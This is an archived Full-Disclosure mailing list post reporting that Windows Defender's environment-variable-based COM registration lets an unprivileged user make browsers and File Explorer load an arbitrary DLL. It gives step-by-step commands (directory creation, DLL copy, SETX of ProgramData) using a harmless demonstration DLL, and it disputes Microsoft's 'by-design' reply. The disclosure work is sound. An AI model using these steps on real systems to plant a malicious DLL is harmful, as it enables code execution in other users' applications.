lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 27 Mar 2020 05:27:56 +0100
From: "Stefan Kanthak" <>
To: <>
Subject: [FD] Defense in depth -- the Microsoft way (part 64): Windows
	Defender loads and exeutes arbitrary DLLs

Hi @ll,

in September 2017, Microsoft relocated many executable files of Windows
Defender from the directory "%ProgramFiles%\Windows Defender\" to
"%ProgramData%\Microsoft\Windows Defender\platform\<version>\": see

JFTR: if Microsoft were only capable to understand English language and
      notice the difference between "(program) DATA" and "program files"!

Ever since this braindead move, which also violates their own "Designed
for Windows" specification, Microsoft registers the paths of Windows
Defender's COM classes using the environment variable %ProgramData%:

@="Defender CSP"

@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\""
;           ~~~~~~~~~~~~~  here there be dragons!

@="Windows Defender IOfficeAntiVirus implementation"

@="Scanned Hosting Applications"


@="ActiveX controls"


@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
;           ~~~~~~~~~~~~~  here there be dragons!

@="Windows Defender WMI Provider"

@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
;           ~~~~~~~~~~~~~  here there be dragons!

Of special interest here is the IOfficeAntiVirus implementation,
an interface introduced with Windows 2000 and Internet Explorer 5:
see <>
and <>

This interface is called by the attachment manager, introduced
with Windows XP SP2 and Internet Explorer 6 SP2: see

The attachment manager in turn is called by web browsers, mail/news
clients, instant messengers etc. after they store a downloaded file,
a web page or an attachment, and by file explorer when such a file
(which has the "mark of the web") is to be opened or executed.

"Thanks" to the environment variable specified in the registered path
"%ProgramData%\Microsoft\Windows Defender\platform\<version>\MpOav.dll",
an unprivileged user/attacker can provide an arbitrary DLL which is
then loaded and executed in web browsers, mail/news clients, instant
messengers and file explorer whenever the user stores or opens a
downloaded file, a web page or an attachment.


On a 32-bit (x86) or 64-bit (x64) installation of Windows 10 with the
anti-malware platform update KB4025623 installed perform the following
11 steps:

0. Log on to an arbitrary (unprivileged) user account and start the
   command processor %COMSPEC% alias %SystemRoot%\System32\CMD.exe.

1. Download <>
   and save it in your "Downloads" directory:


   The downloaded file gets the "mark of the web"!

2. Download <>
   and save it in your "%TEMP%" directory:


   See <> and/or
   <> for the
   description/documentation of SENTINEL.DLL

3. Extract SENTINEL.DLL for both architectures/bitnesses (x86: 32-bit;
   x64: 64-bit) into your "%TEMP%" directory:


4. Display the registered path of MPOAV.dll:

   REG.exe QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32" /VE

| HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32
|    (Default)    REG_EXPAND_SZ    "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2008.6-0\MpOav.dll"

5. Choose an arbitrary directory where you can create subdirectories,
   for example your user profile "%USERPROFILE%", the root directory
   of your Windows drive "%SystemDrive%", or even a shared directory
   like "%COMPUTERNAME%\PUBLIC", and create the subdirectories
   "Microsoft", "Windows Defender", "Platform" plus "<version>" shown
   in the previous step beyond it:

   MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2008.6-0"

6. Copy the SENTINEL.DLL matching the bitness of your system as
   MPOAV.dll into the last directory created in the previous step:

   32-bit (x86)

   COPY "%TEMP%\I386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"

   64-bit (x64)

   COPY "%TEMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"

7. Verify that you copied the correct DLL and its proper function:

   MSIEXEC.exe /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"

8. Set the environment variable "ProgramData" to the directory
   choosen in step 5:

   SETX.exe ProgramData %SystemDrive%

9. Start every web browser available with the same bitness as your
   system, then download an arbitrary file and notice the message box
   displayed by the
   "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
   called from the web browser:

   "%ProgramFiles%\Internet Explorer\IExplore.exe"

10. Start SENTINEL.EXE downloaded in step 1 (which got the "mark of
    the web") and notice the message box again, now called from
    file explorer:


Vendor statement:

The MSRC assigned case 57439 to the above report, and replied with the
following statements:

| After investigation, our engineers have determine this this behavior
| is by-design and does not constitute as a vulnerability as reported.

I recommend to teach these "engineers" the difference between a pathname
registered as "%ProgramData%\...\<filename>.<extension>" and a pathname
registered as "C:\ProgramData\...\<filename>.<extension>"!

HINT: the second variant does NOT allow to load and execute an ARBITRARY
      DLL via an environment variable set by the user!

The observed behaviour is therefore NOT by-design, but due to CARELESS
implementation by CLUELESS developers.

| For an attacker to do as the report indicates, they would already
| need to have gained sufficient control over the victim's system to
| change the ProgramFiles environment variable for the process that
| is instantiating this COM class. This highlights local code execution.
| Additionally, our design to get AV to load in a utility process greatly
| reduces the attack surface of this scenario.

The attack surface is but provided by Windows Defender: its POOR
implementation (see above) allows this attack in the first place.
And there is no utility process started here: the attacker controlled
DLL is loaded and executed ih the processes which want to call AV,
instead of the DLL installed with Windows Defender, and prevents exactly
the intended call of the AV's utility process and defeats your design!

| Utility processes are also more restricted than the browser process
| generally so this is another win in addition to the process decoupling.

There is NO decoupled process involved!
The demonstration runs an arbitrary DLL in the process of any web browser,
any mail/news client, any instant messenger and file explorer as well,
credentials of the current user, UNRESTRICTED.

| As such, we are closing this case.


Use AppLocker or SAFER alias Software Restriction Policies: see

stay tuned, and far away from so-called "security software"
Stefan Kanthak

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists